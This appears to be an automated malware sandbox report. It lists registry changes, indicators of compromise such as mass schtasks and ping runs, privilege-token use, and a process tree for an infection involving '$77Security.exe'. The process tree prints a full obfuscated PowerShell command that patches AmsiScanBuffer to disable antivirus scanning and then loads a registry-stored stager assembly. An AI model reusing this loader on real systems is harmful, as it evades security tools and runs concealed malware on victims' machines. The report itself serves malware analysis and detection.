powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736343166" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={AFFC60BB-A5D1-4221-B940-35474D23C2B6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2253712635-4068079004-3870069674-1000\{94367CA5-1742-4EB4-AE07-5B801FF60CF7} msedge.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 1560 PING.EXE 4020 PING.EXE 4332 PING.EXE 1680 PING.EXE 4772 PING.EXE 4664 PING.EXE 1600 PING.EXE 872 PING.EXE 2100 PING.EXE 2880 PING.EXE 4072 PING.EXE 3528 PING.EXE 3800 PING.EXE 2016 PING.EXE 2772 PING.EXE 1056 PING.EXE 424 PING.EXE 2240 PING.EXE 1164 PING.EXE 588 PING.EXE 3876 PING.EXE 2440 PING.EXE 1056 PING.EXE 1488 PING.EXE 652 PING.EXE 1052 PING.EXE 956 PING.EXE 5052 PING.EXE 4184 PING.EXE 4140 PING.EXE 2216 PING.EXE 2504 PING.EXE 3176 PING.EXE 3384 PING.EXE 4304 PING.EXE 4852 PING.EXE 3448 PING.EXE 952 PING.EXE 4688 PING.EXE 1968 PING.EXE 2584 PING.EXE 4024 PING.EXE 764 PING.EXE 1012 PING.EXE 5028 PING.EXE 2936 PING.EXE 4808 PING.EXE 4492 PING.EXE 5056 Process not Found 1556 PING.EXE 4768 PING.EXE 4020 PING.EXE 4216 PING.EXE 3496 PING.EXE 952 PING.EXE 2232 PING.EXE 2880 PING.EXE 3112 Process not Found 1396 PING.EXE 1064 PING.EXE 5012 PING.EXE 4236 PING.EXE 4764 PING.EXE 1972 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4204 schtasks.exe 5048 schtasks.exe 2040 schtasks.exe 2392 schtasks.exe 2456 schtasks.exe 2532 schtasks.exe 1536 schtasks.exe 3928 schtasks.exe 5036 schtasks.exe 1048 schtasks.exe 2172 Process not Found 4768 schtasks.exe 1572 schtasks.exe 2864 schtasks.exe 1832 schtasks.exe 1840 schtasks.exe 2216 schtasks.exe 3096 schtasks.exe 2636 schtasks.exe 3528 schtasks.exe 4616 schtasks.exe 5080 Process not Found 1536 schtasks.exe 4732 schtasks.exe 4644 schtasks.exe 2876 schtasks.exe 1908 schtasks.exe 1156 schtasks.exe 1656 schtasks.exe 1360 schtasks.exe 2008 schtasks.exe 4688 schtasks.exe 1288 schtasks.exe 1860 schtasks.exe 408 schtasks.exe 1744 schtasks.exe 764 schtasks.exe 5048 schtasks.exe 952 schtasks.exe 4484 Process not Found 4072 schtasks.exe 1396 schtasks.exe 2216 schtasks.exe 5064 schtasks.exe 1620 schtasks.exe 4672 schtasks.exe 1884 schtasks.exe 3208 schtasks.exe 2844 Process not Found 4828 schtasks.exe 2920 schtasks.exe 1224 schtasks.exe 2152 schtasks.exe 3324 schtasks.exe 4788 Process not Found 4576 Process not Found 4612 Process not Found 1360 schtasks.exe 2420 schtasks.exe 5032 schtasks.exe 3536 schtasks.exe 1012 schtasks.exe 2848 schtasks.exe 3984 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1760 msedge.exe 1760 msedge.exe 3656 msedge.exe 3656 msedge.exe 4884 msedge.exe 4884 msedge.exe 1092 identity_helper.exe 1092 identity_helper.exe 3712 powershell.EXE 3712 powershell.EXE 3712 powershell.EXE 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe 1540 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2088 conhost.exe 2516 dlscord.exe 3184 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1456 4363463463464363463463463.exe Token: SeDebugPrivilege 2980 $77Security.exe Token: SeDebugPrivilege 3712 powershell.EXE Token: SeDebugPrivilege 3712 powershell.EXE Token: SeDebugPrivilege 1540 dllhost.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4012 $77Security.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 4596 client.exe Token: SeDebugPrivilege 2088 conhost.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: 33 2088 conhost.exe Token: SeIncBasePriorityPrivilege 2088 conhost.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: 33 2088 conhost.exe Token: SeIncBasePriorityPrivilege 2088 conhost.exe Token: 33 2088 conhost.exe Token: SeIncBasePriorityPrivilege 2088 conhost.exe Token: SeDebugPrivilege 2752 $77Security.exe Token: 33 2088 conhost.exe Token: SeIncBasePriorityPrivilege 2088 conhost.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 3172 Client-built.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 3504 RuntimeBroker.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeDebugPrivilege 1412 sru.exe Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE Token: SeShutdownPrivilege 3184 Explorer.EXE Token: SeCreatePagefilePrivilege 3184 Explorer.EXE -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 2056 chrome.exe 2056 chrome.exe 564 msedge.exe 3580 Process not Found -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3656 msedge.exe 3580 Process not Found -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1184 Process not Found 3580 Process not Found -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 4824 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3656 wrote to memory of 3496 3656 msedge.exe 81 PID 3656 wrote to memory of 3496 3656 msedge.exe 81 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 3332 3656 msedge.exe 82 PID 3656 wrote to memory of 1760 3656 msedge.exe 83 PID 3656 wrote to memory of 1760 3656 msedge.exe 83 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 PID 3656 wrote to memory of 4020 3656 msedge.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4992 Process not Found 2232 Process not Found 2548 Process not Found
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:460
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b96e058e-8992-438e-819d-dcbb35ff671f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KxGZSpPGsjSk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$txhMbTnJaCqLUH,[Parameter(Position=1)][Type]$awonvsNhRA)$qstkvWxSdII=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+'d'+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qstkvWxSdII.DefineConstructor('RT'+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$txhMbTnJaCqLUH).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+'ed');$qstkvWxSdII.DefineMethod(''+'I'+'n'+[Char](118)+'o'+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+',N'+[Char](101)+''+'w'+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'Vir'+[Char](116)+'u'+[Char](97)+''+'l'+'',$awonvsNhRA,$txhMbTnJaCqLUH).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $qstkvWxSdII.CreateType();}$fvosBZElrLxel=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'te'+'m'+''+[Char](46)+''+'d'+''+'l'+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Na'+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$kNaWNUcJRPKPmZ=$fvosBZElrLxel.GetMethod(''+[Char](71)+''+'e'+'tP'+'r'+'o'+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bumMsisafKVAaWpDjsd=KxGZSpPGsjSk @([String])([IntPtr]);$CiZGXADugUxJZaEEkTgvJO=KxGZSpPGsjSk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ulQfpzaPSdy=$fvosBZElrLxel.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+'d'+''+[Char](108)+''+'l'+'')));$vvghEwDRFnXGZl=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$ulQfpzaPSdy,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$WLjfyPlDfzVZbpOpw=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$ulQfpzaPSdy,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$hgCoZob=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vvghEwDRFnXGZl,$bumMsisafKVAaWpDjsd).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$SVXxgADZxVsniWQAc=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$hgCoZob,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+'B'+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$giLXTHeGsW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WLjfyPlDfzVZbpOpw,$CiZGXADugUxJZaEEkTgvJO).Invoke($SVXxgADZxVsniWQAc,[uint32]8,4,[ref]$giLXTHeGsW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SVXxgADZxVsniWQAc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WLjfyPlDfzVZbpOpw,$CiZGXADugUxJZaEEkTgvJO).Invoke($SVXxgADZxVsniWQAc,[uint32]8,0x20,[ref]$giLXTHeGsW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵
- Executes dropped EXE
PID:5028
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵
- Executes dropped EXE
PID:920
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵
- Executes dropped EXE
PID:3168
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:2752
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:1372
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:1620
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:772
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:732
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:2256
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:2492
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:2856
-
-
C:\Users\Admin\AppData\Roaming\$77Security.exeC:\Users\Admin\AppData\Roaming\$77Security.exe2⤵PID:3428
-
-
